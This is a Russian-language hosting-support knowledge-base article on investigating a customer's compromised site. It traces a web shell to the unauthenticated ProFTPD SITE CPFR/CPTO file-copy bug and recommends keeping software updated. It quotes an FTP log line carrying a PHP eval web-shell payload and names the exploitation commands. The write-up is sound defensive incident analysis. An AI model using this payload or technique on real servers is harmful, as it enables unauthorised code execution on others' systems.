База знаний
Как найти уязвимость на хостинге Bug 4169 Unauthenticated copying of files via SITE CPFR/CPTO
Автор:

 

“Bug 4169 Unauthenticated copying of files via SITE CPFR/CPTO” - это уязвимость, которая позволяет злоумышленнику копировать файлы в пределах сервера без проведения аутентификации с помощью команд "site cpfr" и "site cpto". В этой статье подробно описан метод поиска на примере обращения клиента в техподдержку хостинг-провайдера.

 

По заявке клиента файлы сайта проверили сканерами при помощи бесплатноой #getvir. Утилита нашла потенциально опасные уязвимости (перечислить какие) и выявили две критичные. В файлах был реализован web-shell.

Penetration testing показал, как злоумышленник загрузил или создал найденные файлы на файловой системе сервера. Обратите внимание на нестандартный вид web-уязвимости:

----

proftpd: 67.148.215.66:62627: SITE cpto /tmp/.<?php eval($_REQUEST[cmd]); echo GOOD;?>

 

Сами файлы находились в каталоге с полными правами доступа (777), имели владельца proftpd и группу nogroup, что указывало в сторону FTP. В логах web-сервера нашлись неудачные попытки обращения к вредоносным файлам: ответы с кодом 403 (“Запрещено”). Хорошо, что CMS Drupal помещает в расшаренные каталоги файл .htaccess с директивой “Deny from all”.

 

В логах FTP-сервера нашлась неудачная массированная bruteforce-атака и весьма странная запись:

----

2016-04-07 12:12:05,409 *** proftpd[23346] *** (80-110-39-36.static.surfer.at[80.110.39.36]): FTP session opened.
2016-04-07 12:12:05,721 *** proftpd[23346] *** (80-110-39-36.static.surfer.at[80.110.39.36]): error opening destination file '/var/html/admin/infos.php' for copying: No such file or directory
...
2016-04-07 12:13:20,370 *** proftpd[23346] *** (80-110-39-36.static.surfer.at[80.110.39.36]): FTP session closed.

----

Удивил факт успешной авторизации - Login sucessfull. Сессия открывается, происходит обращение к файловой системе и сессия закрывается.

Проанализировав факты и похожие случаи, натолкнулись на описание бага, актуального для версии приложения 1.3.5: http://bugs.proftpd.org/show_bug.cgi?id=4169 А так же описание его использования: https://www.opennet.ru/opennews/art.shtml?num=42015

Уязвимость позволяла копировать файлы в пределах сервера без проведения аутентификации с помощью команд "site cpfr" и "site cpto". Воспроизвели со своей стороны и… сработало! Проблему решили, а клиенту предоставили подробный отчёт о проделанной работе с рекомендацией систематически обновлять программное обеспечение.



Если решение вопроса найти не удалось, Вы можете отправить нам заявку:



(1 голос(а))
Эта статья помогла
Эта статья не помогла

Комментарии (0)
ActiveCloud Служба поддержки клиентов
Здравствуйте! Если вам нужен хостинг или домен — вы можете купить его у нас.
Выбрать тариф